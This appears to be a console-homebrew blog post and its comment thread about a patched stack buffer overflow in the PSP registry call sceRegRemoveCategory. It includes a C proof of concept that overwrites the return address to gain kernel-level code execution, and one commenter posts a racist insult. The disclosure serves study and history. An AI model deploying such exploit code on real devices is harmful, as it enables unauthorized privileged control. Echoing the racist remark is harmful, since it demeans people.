Anatomy of a cool (undisclosed) kernel exploit
How many times have you heard “Kernel exploits are hard to find, devs can’t just release them!”?
Well, that’s not really true, to prove that, here I’m posting a pretty cool bug found a couple of years ago.
Of course, this exploit is patched by now, it wouldn’t make sense to waste a perfectly working exploit right now (even thought there are many…), but I thought it’d be cool to show you guys this 🙂
But first, a bit of history.
In 2011, while investigating registry.prx, I noticed Sony made a pretty dumb error (yes, another one…), and started working with some1 to exploit this.
It only took a few days really to get a POC running, it’s probably one of the easiest exploits ever, a simple, dumb, buffer overflow.
A year ago, I handed it over to jigsaw who used it to investigate Syscall Internals (he did a pretty cool job btw ;))
But now, the exploit.
Basically, we exploited a vulnerability in sceRegRemoveCategory. Basically, this syscall removes a category from the system registry (obviously). It takes two arguments, a REGHANDLE and a string.
The REGHANDLE is a value given to us by sceRegOpenRegistry when we open a valid registry, totally legit, but let’s take a look at that string…
The string is just the name of the category you want to get rid of. In PSP’s system registry, all names start with a ‘/’, and sceRegRemoveCategory checks only that. The first character of the string.
Really, it checks also if the provided string is in kernel space, but we don’t care about that in this case.
RemoveCategory allocates 0x1B (27) bytes on its stack, and then calls a subroutine that basically copies our string onto that space…but it doesn’t check the length of our string!
See the problem here? We can easily overflow that buffer by providing a string that looks like this ‘/<27+ random chars>’.
The return address is stored 0x54 (90) bytes later on the stack, so we can just overwrite it and wait for sceRegRemoveCategory to return, even with an error, we don’t care 😉
tl;dr, here’s a code snippet, callback_addr is the address of the function you want to execute with kernel permissions.
char rmc_stack[0x5A];
struct RegParam exp_params;
REGHANDLE exp_handle;
memset(&exp_params, 0, sizeof(exp_params));
exp_params.regtype = 1;
exp_params.unk2 = 1;
exp_params.unk3 = 1;
exp_params.namelen = strlen("/system");
strcpy(exp_params.name, "/system");
if(!sceRegOpenRegistry(&exp_params, 2, &exp_handle)) //Need a valid registry handle to continue
{
memset(rmc_stack, 'X', 0x5A); //Fill the string with ***
rmc_stack[0] = '/'; //This is enough to fool registry...
rmc_stack[0x5A - 1] = 0;
rmc_stack[0x5A - 2] = (callback_addr >> 24) & 0xFF;
rmc_stack[0x5A - 3] = (callback_addr >> 16) & 0xFF;
rmc_stack[0x5A - 4] = (callback_addr >> 8) & 0xFF;
rmc_stack[0x5A - 5] = callback_addr & 0xFF;
sceRegRemoveCategory(exp_handle, rmc_stack); //;)
}
As I said, this is patched by now (I think it was patched in latest PSV update, not sure), but doesn’t mean you can’t implement it, maybe in some older firmware, for exercise.
I’m honestly surprised it took this long for Sony to patch this, especially when they made the same error in loadexec, back in 2.50 (iirc).
This shows how easy it is to break pspemu security, maybe it’s time to put our resources into something more interesting…
– Freddy
not interested
Interesting read, Freddy. Not checking string lengths really should be a fireable offense. ^^
Don’t say that. The glorious people who allow exploits like this should be praised for making it easy for the devs.
The point on kernel exploits is that they are limited
“This shows how easy it is to break pspemu security, maybe it’s time to put our resources into something more interesting…”
Agreed lol, though that’s why it’s so funny xD
Indeed I just checked and saw it, though it was removed in fw 1.80, only available until 1.67.
In 1.80 though it doesn’t seem Sony patched it, rather they dummied sceRegRemoveCategory with dummy return values lol so maybe they didn’t even notice this.
1.69X also still have it though naturally
nice, but i dunno what it is really do :p
Oh freddy, you don’t give yourself enough credit!
True, nice work freddy
It is still pretty interesting though. Sony didn’t remove the system call, but rather just gave it pre-determined (dummy) return values. If one was able to overwrite this system call with the old one, would the portions of old exploits relating to this system call work yet again???
I like the way you think, if it could be done MHFU FTW
maybe sony might have done the same mistake in psvita security… my saying is that the key is in the firmware stored in the vita like the psp was hiding but someone discoverd the key and very soon psp was hacked and so if the psvita has the same security and a genius guy finda it the vita might be very hacked soon… ALL IT TAKES A LITTLE PUSH
same security? Sorry, but no, they do not have the same security.
still wandering on the vita live screen sony made update in 2.12 think with all the patches sony did since the vitas realse psp xmb with xbox boot sounds cool..i guess would need to get more into the vita side to play with the psp boot screen but did try with ark yet… ark still prety cool..
var is pavit hacked = prompt (“IS PSVITA HACKED”)
if
(“psvita is hacked”){
console.log (“very good”)
}else{
console.log (“very bad”)
{
I have no idea what language you use, but there is def at least 1 syntax error in.
Time to bring out the vita exploits…
security may nat be the whole same cuz sony is said to be learning from its mistakes … But minor security may be same … we do not know right now waht is same and what,s not lets see it in future when the psvita will be completely hacked then we will se whats same and what not……
all we know is that you need to go back to school, or that you are black.
I’ve been contemplating whether to update my TN-V Vita or not and this article really got me thinking about updating, lol. Been tired of not updating my trophies, lol.
Pretty racist, but ok…
@xoombie503
Adx2 is just talking Sony’s encryption securities and about the possibilities of hacking the Vita and etc.. So what do you mean go back to school and that racist remark? So what if his spelling and grammar isn’t all that great, this place is not a writing center where everyone’s punctuation has to be right-on all the time. And sometimes people like to use shorter words.. doesn’t mean they need to go back to school.
So xoombie503 stop being a trolling racist jerk and gtfo man…
@Adx2
Don’t take zoombie seriously.. He could just be trolling to try and spark a fire, or just a seriously messed up person in real life that sadly enjoys to curse, hate, bully, and take it out on people hiding behind their computer screen because it’s easier.
Take care man.
Anyway nice article, freddy_156.
the things that are coming out of his hands?
This is great article but I’m bored with psp emulation. This is history repeating itself. User-mode is great but it is every hard to get a lot of stuff working on it and I’m stuck at 2.10 FW. An like you said Freddy “maybe it’s time to put our resources into something more interesting…” and with all the new Open-source OS’s and ARM development boards. I think you may be right..
There is far more development happening with the 3ds side of things versus the vita we need more people to invest time into breaking the security of the vita and actually be able to use the full specs of the vita and not just enough to see it emulate psp stuff 🙁
If you mean the bootloader,yes.
Though the bootloader is only that,no homebrews/emulators/freedom.
Wonderful, I have a 1.67 right now! Sadly I still cant seem to get Open CMA 4.5 to muster on the current vita I have.. Uno still waiting on the ps3 as well… sigh
looks like u can tweek with ur ps3 i guess was thinking but u need a ps3 with cfw. 1.67 sweet though think the vita iamoncame with 1.80 wich is shity as to the first one i had came brand new n homebrew n outher os ready but i had to update it n not watch youtube first but anyway downgrading the psp was said to go to like 1.51 and 1.50 for japan or sumthing..
isnt the buffer overflow the same as the stack overflow in windows pc and whatnot?
No. A stack overflow is a specific case of buffer overflow, and none of this is specific to windows vs pc vs psp.
Nintendo made a similar mistake with Twilight Princess for the Wii where you could edit the save file and make the horse’s name longer than what was allowed and it caused a buffer overflow. Since retail Wii games can’t be updated Nintendo had to patch the bug in the Wii system software by having the system software explicitly check the save file and if the horse’s name was too long it would delete the save file. Although it took Nintendo a few tries to get it right.
It seems really silly to have a string value and not check to make sure the value is of the right length and if not, do some kind of error. Then again Sony probably outsourced their programmers and don’t pay them enough to check for serious bugs like this.
I would really like a actual PSV hack, not for backup games but image the emulating possiblitys i could play Banjo Tooie on it with no lag at all
Go Go Gadget 2035 psv Ecfw!
Well, saying this string is unchecked and knowing how to use it are two different things; Though this is in no way a proof of the amount of kexploits still in PSP kernel;
i still have 2.12 downloaded n ready to install on the vita on 2.06 last i cheack. shity thing would be were u need a vita at like 150 to downgrade a 206 vita last i cheack sony was running the new 2.. on the vita at 1.80 and 2.02
i was facebook app need an update…..
I hate myself for whenever i see codes, I WANT TO BANG MY HEAD ON THE KEYBOARD and say to myself… WHY DID’nT I KNOW THIS!! Why cant i UNDERSTAND THIS THING!!
int main(){
cout << "as of now, this is the only thing i can do and all other arithmetic calculations and some knowledge on variables" << endl;
return 0;
}
I WANT TO LEARN TO CODE.
dont feel bad all I know is su fix_permission in terminal on my android ,makes me look cool when i eat at a dinner with a cute waitress around lol
tbh… C and C++ are really horrible and not noob friendly.. I tried coding that in middle school for nds homebrew and it didnt come out too well.
So I tried with Objective C and learned it relatively much quicker. I think the syntax for Objective C maks more sense and is far more intuitive than that of the older C itself..
@NeonAera thnks for supporting me …
and
@xoombie503 are u a grammer teacher u *** ..nAH JST JOIKIG 🙂
@nevercall
i think u should visit code.org and u can learn to code..
i m learning javascript programming on code.org u can learn anything related to coding there its really helpfull